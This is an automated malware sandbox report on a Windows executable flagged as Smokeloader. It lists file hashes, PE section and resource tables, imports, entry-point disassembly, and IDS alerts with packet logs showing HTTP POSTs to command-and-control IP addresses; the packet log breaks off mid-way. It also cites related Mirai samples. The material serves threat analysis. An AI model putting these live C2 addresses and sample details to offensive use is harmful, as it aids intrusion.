                                      LVLT-3549USarm.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 193.245.180.40
                                      YsI7t2OC5q.elfGet hashmaliciousMiraiBrowse
                                      • 35.248.229.35
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.16.179.196
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.73.174.73
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.73.174.73
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.73.174.73
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.73.174.73
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.73.174.73
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.73.174.73
                                      na.elfGet hashmaliciousMiraiBrowse
                                      • 67.73.174.73
                                      No context
                                      No context
                                      Process:C:\Windows\explorer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):294400
                                      Entropy (8bit):5.5821574905838105
                                      Encrypted:false
                                      SSDEEP:3072:iBILhZ6F7bBPQYK3+9L4xwafTdJ5+CyxF9DavCEkXFUCIqzpZAqa8i:iBI87b4SL4qw8/43kXFVIqzpZAqaR
                                      MD5:278DF1E655D9D27B659468EA21758D17
                                      SHA1:51D59CBC9E28708086517EA33FF07A9B2CFB3FCF
                                      SHA-256:2B727F4B529097748B5C49720BB42DA02EFB7758BF6870ACFD4404C24B60840B
                                      SHA-512:C7E6F1325D88EFB57AA123B52D4B4276024C267980F0C72D2F3F058E568A781AFB14207DDE6FC84B98BF308518D2B92304DA6939D8A2056D79E11089CDD8DEC7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 39%
                                      • Antivirus: Virustotal, Detection: 41%, Browse
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..K~...~...~...`.x.e...`.i.n...`...4...Y...y...~.......`.v.....`.h.....`.m.....Rich~...........PE..L......d.................J...ls..............`....@...........................t.............................................4w..P.....r..............................................................................`...............................text...oI.......J.................. ..`.rdata..b ...`..."...N..............@..@.data...|.o..........p..............@....dazit...D....q..8..................@....xepegi..(....q..(..................@....rsrc.........r.....................@..@................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\explorer.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):5.5821574905838105
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:K80v6DHFHE.exe
                                      File size:294'400 bytes
                                      MD5:278df1e655d9d27b659468ea21758d17
                                      SHA1:51d59cbc9e28708086517ea33ff07a9b2cfb3fcf
                                      SHA256:2b727f4b529097748b5c49720bb42da02efb7758bf6870acfd4404c24b60840b
                                      SHA512:c7e6f1325d88efb57aa123b52d4b4276024c267980f0c72d2f3f058e568a781afb14207dde6fc84b98bf308518d2b92304da6939d8a2056d79e11089cdd8dec7
                                      SSDEEP:3072:iBILhZ6F7bBPQYK3+9L4xwafTdJ5+CyxF9DavCEkXFUCIqzpZAqa8i:iBI87b4SL4qw8/43kXFVIqzpZAqaR
                                      TLSH:0B54D78252E12C07EFB64B328E39D5D4A62EFD525E7572EEA1047E0F14BB1B1E113B12
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..K~...~...~...`.x.e...`.i.n...`...4...Y...y...~.......`.v.....`.h.....`.m.....Rich~...........PE..L......d.................J.
                                      Icon Hash:738733b18b838bec
                                      Entrypoint:0x4018e4
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6492C0AC [Wed Jun 21 09:19:40 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:f9644889fc4743405befff91cfd6f312
                                      Instruction
                                      call 00007F03308E1550h
                                      jmp 00007F03308DDE4Dh
                                      mov edi, edi
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 00000328h
                                      mov dword ptr [0041A3D0h], eax
                                      mov dword ptr [0041A3CCh], ecx
                                      mov dword ptr [0041A3C8h], edx
                                      mov dword ptr [0041A3C4h], ebx
                                      mov dword ptr [0041A3C0h], esi
                                      mov dword ptr [0041A3BCh], edi
                                      mov word ptr [0041A3E8h], ss
                                      mov word ptr [0041A3DCh], cs
                                      mov word ptr [0041A3B8h], ds
                                      mov word ptr [0041A3B4h], es
                                      mov word ptr [0041A3B0h], fs
                                      mov word ptr [0041A3ACh], gs
                                      pushfd
                                      pop dword ptr [0041A3E0h]
                                      mov eax, dword ptr [ebp+00h]
                                      mov dword ptr [0041A3D4h], eax
                                      mov eax, dword ptr [ebp+04h]
                                      mov dword ptr [0041A3D8h], eax
                                      lea eax, dword ptr [ebp+08h]
                                      mov dword ptr [0041A3E4h], eax
                                      mov eax, dword ptr [ebp-00000320h]
                                      mov dword ptr [0041A320h], 00010001h
                                      mov eax, dword ptr [0041A3D8h]
                                      mov dword ptr [0041A2D4h], eax
                                      mov dword ptr [0041A2C8h], C0000409h
                                      mov dword ptr [0041A2CCh], 00000001h
                                      mov eax, dword ptr [00419008h]
                                      mov dword ptr [ebp-00000328h], eax
                                      mov eax, dword ptr [0041900Ch]
                                      mov dword ptr [ebp-00000324h], eax
                                      call dword ptr [000000F0h]
                                      Programming Language:
                                      • [C++] VS2008 build 21022
                                      • [ASM] VS2008 build 21022
                                      • [ C ] VS2008 build 21022
                                      • [IMP] VS2005 build 50727
                                      • [RES] VS2008 build 21022
                                      • [LNK] VS2008 build 21022
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x177340x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x27210000x29810.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x160000x190.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x1496f0x14a00017412b3a78f0e77be68b00d88053d64False0.8211292613636364data7.534628882954891IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x160000x20620x2200160cce12c5b12d62944f68724786d475False0.36328125data5.445425145565832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x190000x26fff7c0x14008da7d0568b68a86023cfd4ba13def4faunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .dazit0x27190000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .xepegi0x271e0000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x27210000x298100x29a00c7a219fd936649e9e6564e7104748d02False0.3730058183183183data4.758448918209474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      AFX_DIALOG_LAYOUT0x273f0a80x2data5.0
                                      RT_CURSOR0x273f0b00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                      RT_CURSOR0x273f1f80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                      RT_CURSOR0x273f3280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                      RT_CURSOR0x27418f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                      RT_CURSOR0x27427b80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                      RT_CURSOR0x27428e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                      RT_ICON0x2721e000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5674307036247335
                                      RT_ICON0x2722ca80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6376353790613718
                                      RT_ICON0x27235500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6849078341013825
                                      RT_ICON0x2723c180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7456647398843931
                                      RT_ICON0x27241800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.512863070539419
                                      RT_ICON0x27267280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6137429643527205
                                      RT_ICON0x27277d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6163934426229508
                                      RT_ICON0x27281580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7553191489361702
                                      RT_ICON0x27286380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3347547974413646
                                      RT_ICON0x27294e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5221119133574007
                                      RT_ICON0x2729d880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5846774193548387
                                      RT_ICON0x272a4500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6307803468208093
                                      RT_ICON0x272a9b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42686721991701243
                                      RT_ICON0x272cf600x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5061475409836066
                                      RT_ICON0x272d8e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5079787234042553
                                      RT_ICON0x272ddb80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3350213219616205
                                      RT_ICON0x272ec600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.388086642599278
                                      RT_ICON0x272f5080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.39285714285714285
                                      RT_ICON0x272fbd00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.40534682080924855
                                      RT_ICON0x27301380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.21950207468879668
                                      RT_ICON0x27326e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.2474202626641651
                                      RT_ICON0x27337880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.2815573770491803
                                      RT_ICON0x27341100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.31117021276595747
                                      RT_ICON0x27345f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39285714285714285
                                      RT_ICON0x27354980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5537003610108303
                                      RT_ICON0x2735d400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6226958525345622
                                      RT_ICON0x27364080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                      RT_ICON0x27369700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.425422138836773
                                      RT_ICON0x2737a180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4209016393442623
                                      RT_ICON0x27383a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.46187943262411346
                                      RT_ICON0x27388700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.279317697228145
                                      RT_ICON0x27397180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.3664259927797834
                                      RT_ICON0x2739fc00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.3773041474654378
                                      RT_ICON0x273a6880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3764450867052023
                                      RT_ICON0x273abf00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.2587136929460581
                                      RT_ICON0x273d1980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.27345215759849906
                                      RT_ICON0x273e2400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.28852459016393445
                                      RT_ICON0x273ebc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.32180851063829785
                                      RT_STRING0x27450700xaadata0.5588235294117647
                                      RT_STRING0x27451200x600data0.4361979166666667
                                      RT_STRING0x27457200x460data0.45
                                      RT_STRING0x2745b800x64adata0.4360248447204969
                                      RT_STRING0x27461d00x7b8data0.4185222672064777
                                      RT_STRING0x27469880x6d0data0.4294724770642202
                                      RT_STRING0x27470580x76cdata0.42526315789473684
                                      RT_STRING0x27477c80x606data0.4455252918287938
                                      RT_STRING0x2747dd00x7c2data0.42245720040281975
                                      RT_STRING0x27485980x810data0.42102713178294576
                                      RT_STRING0x2748da80x584data0.4461756373937677
                                      RT_STRING0x27493300x74cdata0.4234475374732334
                                      RT_STRING0x2749a800x710data0.4303097345132743
                                      RT_STRING0x274a1900x5f6data0.4325032765399738
                                      RT_STRING0x274a7880x88data0.625
                                      RT_GROUP_CURSOR0x273f1e00x14data1.15
                                      RT_GROUP_CURSOR0x27418d00x22data1.088235294117647
                                      RT_GROUP_CURSOR0x27427a00x14data1.25
                                      RT_GROUP_CURSOR0x2744e900x22data1.088235294117647
                                      RT_GROUP_ICON0x272dd500x68dataTurkishTurkey0.7019230769230769
                                      RT_GROUP_ICON0x27345780x76dataTurkishTurkey0.6694915254237288
                                      RT_GROUP_ICON0x273f0300x76dataTurkishTurkey0.6694915254237288
                                      RT_GROUP_ICON0x27285c00x76dataTurkishTurkey0.6610169491525424
                                      RT_GROUP_ICON0x27388080x68dataTurkishTurkey0.7211538461538461
                                      RT_VERSION0x2744eb80x1b4data0.5871559633027523
                                      DLLImport
                                      KERNEL32.dllOpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, FormatMessageA, SetCommState, GetLocaleInfoW, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, DeleteVolumeMountPointA, SetConsoleMode, GetFileAttributesW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetConsoleAliasExesLengthA, GetTimeFormatW, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                                      GDI32.dllGetBoundsRect
                                      ADVAPI32.dllClearEventLogW
                                      Language of compilation systemCountry where language is spokenMap
                                      TurkishTurkey
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-13T18:27:45.303931+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464968148.230.249.980TCP
                                      2024-10-13T18:27:46.963293+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464969148.230.249.980TCP
                                      2024-10-13T18:27:47.919755+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464970148.230.249.980TCP
                                      2024-10-13T18:27:48.894639+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464971148.230.249.980TCP
                                      2024-10-13T18:27:49.898590+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464972148.230.249.980TCP
                                      2024-10-13T18:27:50.854819+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464973148.230.249.980TCP
                                      2024-10-13T18:27:51.827443+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464974148.230.249.980TCP
                                      2024-10-13T18:27:52.778261+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464975148.230.249.980TCP
                                      2024-10-13T18:27:53.738201+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464976148.230.249.980TCP
                                      2024-10-13T18:27:54.709329+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464977148.230.249.980TCP
                                      2024-10-13T18:27:55.664115+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464978148.230.249.980TCP
                                      2024-10-13T18:27:56.624121+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464979148.230.249.980TCP
                                      2024-10-13T18:27:57.590520+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464981148.230.249.980TCP
                                      2024-10-13T18:27:58.543210+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464987148.230.249.980TCP
                                      2024-10-13T18:27:59.558359+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464993148.230.249.980TCP
                                      2024-10-13T18:28:00.521490+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.464999148.230.249.980TCP
                                      2024-10-13T18:28:01.500523+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465005148.230.249.980TCP
                                      2024-10-13T18:28:02.470685+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465016148.230.249.980TCP
                                      2024-10-13T18:28:03.627242+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465022148.230.249.980TCP
                                      2024-10-13T18:28:04.593154+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465028148.230.249.980TCP
                                      2024-10-13T18:28:05.564245+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465034148.230.249.980TCP
                                      2024-10-13T18:28:06.520404+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465046148.230.249.980TCP
                                      2024-10-13T18:28:07.527668+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465052148.230.249.980TCP
                                      2024-10-13T18:28:08.550643+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465058148.230.249.980TCP
                                      2024-10-13T18:28:09.504054+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465064148.230.249.980TCP
                                      2024-10-13T18:28:10.465258+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465070148.230.249.980TCP
                                      2024-10-13T18:28:11.447931+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465080148.230.249.980TCP
                                      2024-10-13T18:28:12.404007+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465082148.230.249.980TCP
                                      2024-10-13T18:28:13.361965+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465092148.230.249.980TCP
                                      2024-10-13T18:28:14.318728+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465099148.230.249.980TCP
                                      2024-10-13T18:28:15.828924+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465105148.230.249.980TCP
                                      2024-10-13T18:28:16.790815+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465115148.230.249.980TCP
                                      2024-10-13T18:28:17.753342+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465122148.230.249.980TCP
                                      2024-10-13T18:28:18.775757+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465128148.230.249.980TCP
                                      2024-10-13T18:28:19.728904+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465134148.230.249.980TCP
                                      2024-10-13T18:28:20.704701+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465140148.230.249.980TCP
                                      2024-10-13T18:29:26.607711+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465270148.230.249.980TCP
                                      2024-10-13T18:29:28.771259+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465271148.230.249.980TCP
                                      2024-10-13T18:29:30.033311+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465272148.230.249.980TCP
                                      2024-10-13T18:29:31.548788+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465273148.230.249.980TCP
                                      2024-10-13T18:29:32.705945+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465274148.230.249.980TCP
                                      2024-10-13T18:29:38.370062+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465275148.230.249.980TCP
                                      2024-10-13T18:29:43.415784+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465276148.230.249.980TCP
                                      2024-10-13T18:29:48.487284+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465277148.230.249.980TCP
                                      2024-10-13T18:29:53.628328+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465278148.230.249.980TCP
                                      2024-10-13T18:29:59.682273+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465279148.230.249.980TCP
                                      2024-10-13T18:30:06.086268+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465280148.230.249.980TCP
                                      2024-10-13T18:30:12.261434+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465281148.230.249.980TCP
                                      2024-10-13T18:30:21.478641+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465282190.156.239.4980TCP
                                      2024-10-13T18:30:27.201694+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465283190.156.239.4980TCP
                                      2024-10-13T18:30:33.413089+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465284190.156.239.4980TCP
                                      2024-10-13T18:30:39.987751+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465285190.156.239.4980TCP
                                      2024-10-13T18:30:45.633160+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465286190.156.239.4980TCP
                                      2024-10-13T18:30:52.041561+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465287190.156.239.4980TCP
                                      2024-10-13T18:30:57.539699+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465288190.156.239.4980TCP
                                      2024-10-13T18:31:04.509515+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465289190.156.239.4980TCP
                                      2024-10-13T18:31:10.096614+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.465290190.156.239.4980TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 13, 2024 18:27:44.322470903 CEST6496880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:44.327584028 CEST8064968148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:44.327867985 CEST6496880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:44.338875055 CEST6496880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:44.338875055 CEST6496880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:44.344046116 CEST8064968148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:44.344127893 CEST8064968148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:45.302810907 CEST8064968148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:45.303859949 CEST8064968148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:45.303930998 CEST6496880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:45.307379007 CEST6496880192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:45.312424898 CEST8064968148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:45.322740078 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:45.328291893 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:45.328598022 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:45.331068039 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:45.331068039 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:45.335994959 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:45.336071968 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.963160038 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.963207006 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.963236094 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.963268042 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.963293076 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.963293076 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.963397980 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.967463017 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.967504978 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.967544079 CEST6496980192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.970889091 CEST6497080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.972407103 CEST8064969148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.976089001 CEST8064970148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.976293087 CEST6497080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.976579905 CEST6497080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.976579905 CEST6497080192.168.2.4148.230.249.9
                                      Oct 13, 2024 18:27:46.981838942 CEST8064970148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:46.981878042 CEST8064970148.230.249.9192.168.2.4
                                      Oct 13, 2024 18:27:47.918625116 CEST8064970148.230.249.9192.168.2.4
